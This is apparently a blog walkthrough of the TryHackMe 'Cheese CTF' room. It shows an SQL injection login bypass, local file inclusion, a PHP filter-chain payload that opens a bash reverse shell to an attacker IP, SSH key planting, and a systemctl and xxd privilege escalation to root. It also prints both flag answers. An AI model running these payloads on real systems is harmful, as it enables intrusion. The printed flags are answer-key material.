TryHackMe: Cheese CTF || Walkthrough
Let’s break down the approach and solve this room!
Step 1: Setting Up and Initial Recon
To get started, I created a directory for Cheese CTF on my machine. Since a Nmap scan isn’t particularly necessary in this case, I skipped it after confirming that Port 80 and SSH (Port 22) were the main focus here.
Once you have the target IP, copy it into your browser. The website presents itself as a cheese shop with a few functionalities: Products, About Us, Contact, and Login. Most of these links lead to the same page, except for the Login, which opens a new page.
Step 2: Investigating the Web Page
I began by inspecting the View Page Source for any clues. While there wasn’t much initially, I did notice that the login link had been recently added. Despite some attempts at brute-forcing the login (using common combinations like `admin:admin`), nothing seemed to work.
So, what’s next when brute force fails? Let’s move on to SQL injection.
Step 3: SQL Injection Attack
I attempted a basic SQL injection query:
' OR 1=1;-- -This didn’t work, so I tried a slight variation, you can check out different payload for SQL injection at GitHub — payloadbox/sql-injection-payload-list: 🎯 SQL Injection Payload List:
' || '1'='1';-- -And we get a page with a cheese shop admin panel:
However, browsing through users and orders didn’t yield much, except for a secret script: `secret_script.php` in the URL as shown in the above image. This script had a `file` parameter, so I realized that this could be vulnerable to File Inclusion.
Step 4: Exploiting File Inclusion vulnerability
I tested the vulnerability by attempting to access sensitive system files like `/etc/passwd` through the `file` parameter. The page loaded the file successfully, confirming the vulnerability.
Guys from here on things starts to get interesting…
Step 5: Gaining Remote Code Execution (RCE)
The next step was to use this to gain remote code execution (RCE). After researching, I found a Python script online to help generate a PHP filter payload. This would allow us to leverage the LFI (Local File Inclusion) to execute arbitrary commands on the server. The link is given below:
Run the following command:
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 php_filter_chain_generator.py --chain "<?php exec('/bin/bash -c \"bash -i >& /dev/tcp/10.6.74.42/4444 0>&1\"'); ?>" | grep "^php" > payload.txtAnd we get the payloads:
Using the generated payload, equip `curl` to execute it on the target system. With Netcat listener already running, you will quickly gain a shell as the www-data user.
Curl the payload.txt to the victim machine after starting the netcast listener on port 4444:
┌──(kali㉿kali)-[~/Desktop]
└─$ curl "http://10.10.221.128/secret-script.php?file=$(cat payload.txt)"And we get the shell as www-data:
Step 6: Privilege Escalation
With access, navigate to the `/tmp` directory and download LinPEAS, a tool that helps with Linux privilege escalation. Execute it to search for ways to escalate privileges to a more powerful user.
“LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on book.hacktricks.xyz”
So get the linpeas.sh file on the victim machine after downloading it to your own machine, to do this follow the steps given in the website: https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS
Start a Python server on your machine and in the victim machine, wget the linpeas.sh file
Once you have linpeas.sh file on the victim machine proceeds as following:
give execute permission to Linpeas once it has been downloaded:
www-data@cheesectf:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.shExecute linpeas:
./linpeas.sh
Linpeas flagged some interesting files, notably writable files in /home/comt/.ssh/authorized_keys, which could be modified. This means we can create our own SSH key pair on my local machine and add the public key to this file, allowing us to log in as comte.
Next create a SSH key on your local machine as following:
─$ sudo ssh-keygen -t rsa
[sudo] password for kali:
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:CZelIpOxyM8BAtvjP957aKZ92rS/D+JLPuVBuMU+uJ0 root@kali
The key's randomart image is:
+---[RSA 3072]----+
|+ . . . |
| = o + + |
|. = * o +o |
| . + + +..+ |
| . o S* |
| . o = |
| o .+=.+ |
| . ++*=oE. |
| o+==*+oo. |
+----[SHA256]-----+Next copy the SSH key from id_rsa.pub file:
Paste the key in the victim machine as:
After generating an SSH key and adding it to the authorized keys file, log in as the comte user. It is shown below:
┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa comte@10.10.221.128
And we get the first flag of user.txt if you ls and cat user.txt when logged in as comte.
#2.1 What is the user.txt flag?
Answer: THM{9f2ce3df1beeecaf695b3a8560c682704c31b17a}
Step 7: Exploiting Systemctl for Root Access
Once logged in, I ran `sudo -l` to check Comte’s privileges.
I found that I could execute systemctl and modify a file called `exploit.timer`, which was used to run an exploit service.
The `exploit.timer` file had a faulty configuration, but since I had write access, I was able to fix the settings. I set the timer to run every 5 seconds and started the service.
After changing the value of the OnBootSec run the following command, which just restarts the services and makes the status of exlpoit.timer to Active, which in fact will run the service exploit.service.
The service would trigger exploit.service, which gave setuid permissions to the `xxd` binary, allowing it to run with elevated privileges.
Step 8: Writing to Root’s SSH and Gaining Root
So next navigate to GTFOBins to know how we can use the xxd to gain sudo privileges.
So we can use the file write option to write the ssh key we generated to gain root privileges, with access to the `xxd` binary, write the SSH public key we created before directly into the root user’s `.ssh/authorized_keys` file.
LFILE=file_to_write
echo DATA | xxd | xxd -r - "$LFILE"
Next ssh to the target machine as root, completing the final step! We now have full control of the machine!!!
──(kali㉿kali)-[~]
└─$ ssh -i id_rsa root@10.10.221.128Next is and find the root.txt and cat the file to reveal the flag:
#2.2 What is the root.txt flag?
Answer: THM{dca75486094810807faf4b7b0a929b11e5e0167c}
